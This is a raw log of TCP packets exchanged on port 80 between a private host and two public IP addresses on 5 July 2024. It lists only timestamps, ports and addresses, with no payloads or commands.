Jul 5, 2024 07:16:46.051583052 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.051604033 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.052241087 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.052268982 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.052285910 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.052310944 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.052344084 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.052361965 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.052400112 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.053108931 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.053137064 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.053153038 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.053193092 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.129929066 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.129955053 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.130004883 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.209372044 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.209435940 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.209454060 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.209482908 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.209491968 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.209538937 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.209573984 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.209649086 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.209666967 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.209681988 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.209688902 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.209733963 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.209954023 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.210024118 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.210038900 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.210076094 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.210170031 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.210186958 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.210203886 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.210227966 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.210705996 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.210748911 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.210772038 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.210788012 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.210825920 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.210865974 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.210881948 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.210925102 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.211281061 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.211308002 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.211323977 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.211350918 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.211464882 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.211488962 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.211513996 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.211530924 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.211539030 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.211594105 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.212184906 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.212225914 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.212244987 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.212270021 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.212385893 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.212402105 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.212418079 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.212440014 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.212441921 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.212496996 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.213121891 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.213143110 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.213151932 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.213191986 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.213224888 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.213242054 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.213258982 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.213275909 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.213284016 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.213325977 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.213900089 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.213928938 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.213944912 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.213973045 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.214086056 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.214102030 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.214119911 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.214138031 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.214142084 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.214184999 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.214746952 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.214775085 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.214790106 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.214817047 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.214915037 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.214931011 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.214946032 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.214962006 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.214993954 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.215019941 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.215626955 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.215702057 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.215717077 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.215744019 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.215811968 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.215828896 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.215847015 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.215847969 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.215877056 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.215908051 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.216510057 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.216593981 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.216603041 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.216619968 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.216717958 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.216734886 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.216764927 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.217164993 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.217215061 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.217251062 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.217267990 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.217386961 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.271276951 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.271289110 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.271373034 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.289153099 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.289175034 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.289186001 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.289217949 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.289400101 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.289412022 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.289421082 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.289432049 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.289452076 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.289469957 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.289536953 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.289549112 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.289558887 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.289567947 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.289582968 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.289603949 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.289776087 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.289787054 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.289798021 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.289807081 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.289822102 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.289833069 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.290009975 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.290020943 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.290030003 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.290041924 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.290052891 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.290081978 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.290254116 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.290265083 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.290275097 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.290302038 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.290319920 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.290333033 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.290344000 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.290354013 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.290364027 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.290364981 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.290375948 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.290390968 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.290417910 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.290757895 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.290769100 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.290812016 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.342653036 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.342839003 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.342921972 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.368702888 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.368712902 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.368779898 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.368840933 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.368910074 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.368978977 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.368990898 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369000912 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369026899 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.369149923 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369160891 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369169950 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369204044 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.369309902 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369319916 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369328976 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369338989 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369349957 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369359970 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369363070 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.369370937 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369384050 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.369395971 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.369697094 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369709015 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369719028 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369729042 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369752884 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.369808912 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369823933 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369832993 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369844913 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369853973 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369860888 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.369865894 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369874954 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.369879007 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369894028 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.369918108 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.370402098 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.370413065 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.370423079 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.370448112 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.448398113 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.448420048 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.448430061 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.448453903 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.448472977 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.448569059 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.448581934 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.448587894 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.448594093 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.448618889 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.448740005 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.448759079 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.448767900 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.448798895 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.448865891 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.448877096 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.448887110 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.448913097 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.448995113 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449042082 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.449071884 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449083090 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449104071 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449114084 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449119091 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.449127913 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449151993 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.449419022 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449430943 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449440956 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449451923 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449464083 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.449496031 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.449651957 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449665070 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449673891 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449686050 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449697971 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.449717045 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.449884892 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449896097 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.449935913 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.607100964 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607135057 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607146025 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607209921 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.607273102 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607286930 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607297897 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607310057 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607331991 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.607357979 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.607507944 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607522011 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607532978 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607542992 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607554913 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607562065 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.607568026 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607582092 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607594013 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607594013 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.607608080 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607616901 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.607652903 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.607954979 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607968092 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607979059 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.607992887 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608001947 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.608006001 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608019114 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608031034 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.608031988 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608057022 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.608417034 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608428955 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608439922 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608453035 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608464003 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608470917 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.608477116 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608493090 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.608495951 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608516932 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.608779907 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608793020 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608804941 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608810902 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608823061 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608834982 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608843088 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.608846903 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.608856916 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.608886003 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.686263084 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.686320066 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.686331987 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.686367989 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.686403036 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.686417103 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.686455011 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.686491013 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.686505079 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.686539888 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.686623096 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.686638117 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.686650991 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.686671972 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:46.856370926 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:46.861398935 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:46.861455917 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:46.861531973 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:46.867527008 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:46.903043032 CEST	80	49175	91.92.254.194	192.168.2.22
Jul 5, 2024 07:16:46.903093100 CEST	49175	80	192.168.2.22	91.92.254.194
Jul 5, 2024 07:16:47.490062952 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.490089893 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.490099907 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.490128040 CEST	49176	80	192.168.2.22	172.232.56.138
Jul 5, 2024 07:16:47.491154909 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.491167068 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.491178989 CEST	80	49176	172.232.56.138	192.168.2.22
Jul 5, 2024 07:16:47.491189957 CEST	80	49176	172.232.56.138	192.168.2.22
